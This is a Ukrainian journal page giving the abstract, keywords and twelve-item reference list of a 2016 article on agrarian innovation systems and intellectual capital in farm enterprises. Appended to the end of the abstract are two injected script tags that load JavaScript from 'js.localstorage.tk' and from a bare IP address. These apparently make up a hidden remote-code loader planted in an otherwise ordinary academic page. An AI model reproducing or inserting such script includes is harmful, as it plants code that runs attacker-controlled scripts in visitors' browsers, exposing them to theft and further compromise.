ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.142:631
Сторінка молодого науковця

Формування аграрної інноваційної системи як шлях до накопичення інтелектуального капіталу підприємств агросектору / Коломієць Т.В. // Економіка АПК. - 2016. - № 11 - С. 94

У статті розкрито питання необхідності формування та накопичення інтелектуального капіталу в межах функціонування аграрних суб’єктів господарювання. Визначено, що формування інтелектуальних ресурсів й їхня капіталізація тісно зв’язані з інноваційними процесами. Підкреслено важливість реформування сучасної системи аграрної освіти та науки для продукування актуальних наукових досліджень і розробок, норма віддачі яких (згідно з міжнародними дослідженнями) є доволі високою. Запропоновано створення аграрної інноваційної системи як сукупності інститутів аграрної сфери, які, перебуваючи у зв’язку та взаємодії, генерують і поширюють знання й технологій та забезпечують їхнє перетворення в інноваційні ресурси, необхідні для агропідприємств, держави й суспільства. Розроблено загальний алгоритм функціонування такої системи у сучасних умовах господарювання, керуючись принципами рівного доступу агровиробників до розробок. Табл.: 2. Рис.: 1. Бібліогр.: 12.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: інтелектуальний капітал, інноваційно орієнтована економіка, інноваційний розвиток, аграрна інноваційна система, аграрні наукові дослідження, аграрна наука

Список використаних джерел

 1. Білов Г. О. Інтелектуальний капітал в системі економічних відносин агропромислових підприємств України: автореф. дис.. канд. екон. наук : 08.00.04 / Г. О. Білов ; Міжнар. ун-т бізнесу і права. - Херсон, 2009. - 20 с. - укp.
 2. Володін С. А. Модель інноваційного розвитку аграрної науки на прикладі системи НААН України / С. А. Володін // Інноваційна економіка. - 2014. - № 3. - С. 5-24.
 3. Єрємєєва А. В. Вплив інтелектуального капіталу аграрної науки на ефективність аграрного сектору України / А. В. Єрємєєва // Технологический аудит и резервы производства. - 2014. - № 1/5 (15). - С. 49-52.
 4. Калетнік Г.М. Науково-навчально-виробничий комплекс як концепція механізму переходу агропромислового виробництва на інноваційну модель розвитку / Г. М. Калетнік // Економіка АПК. - 2013. - № 9. - С. 5-11
 5. Курило Л. І. Розвиток інтелектуального капіталу в аграрній сфері України : автореф. дис.. д-ра екон. наук : 08.00.03 / Л. І. Курило ; Нац. акад. аграр. наук України, Нац. наук. центр «Ін-т аграр. економіки». - К. : [б. и.], 2013. - 36 с.
 6. Кьостер У. Інформаційна система та аграрна освіта в Україні - заклик до реформ : консультативна робота AgPP № 30 / У. Кьостер, К. Шуман, А. Ліссітса // Ін-т екон. досліджень та політичних консультацій, Німецька Консультативна Група при Уряді України. - К., 2010. - 42 с.
 7. Сіренко Н.М. Управління інноваційною системою аграрного підприємства / Н. М. Сіренко // Економіка АПК. - 2009. - № 9. - С. 43-46.
 8. Смолій Л. Інвестиційні аспекти формування інтелектуального капіталу в аграрному виробництві / Л. Смолій // Галицький екон. вісн. - 2014. - № 1. - С. 62-69. - Режим доступу: http://nbuv.gov.ua/UJRN/gev_2014_1_11.
 9. Шпикуляк О. Г. Розвиток інститутів інноваційної діяльності у формуванні інтелектуального капіталу : теоретичний аспект / [Шпикуляк О. Г., Курило Л. І., Лузан О. Ю.] // Економіка АПК. - 2013. - № 7 - С. 92
 10. Стратегія секторної конкурентоспроможності для України - фаза ІІІ. Політика щодо інвестування у сільське господарство: Україна. Звіт за підсумками проекту. Груд. 2015. [Електронний ресурс]. - Режим доступу : http://www.oecd.org/globalrelations/Agricultural_Investment_Policies_Ukraine_UK R.pdf
 11. Alston J.M. A Meta Analysis of Rates of Return to Agricultural R&D: Ex Pede Herculem // Alston, J.M., C. Chan-Kang, M.C. Marra, P.G. Pardey, T.J. Wyatt / Washington D.C., IFPRI Research Report. - 2000. - No. 113.
 12. Офіц. сайт Головного управління статистики у Вінницькій області [Електронний ресурс]. - Режим доступу: http://www.vn.ukrstat.gov.ua.
Читати статтю: e_apk_2016_11_17.pdf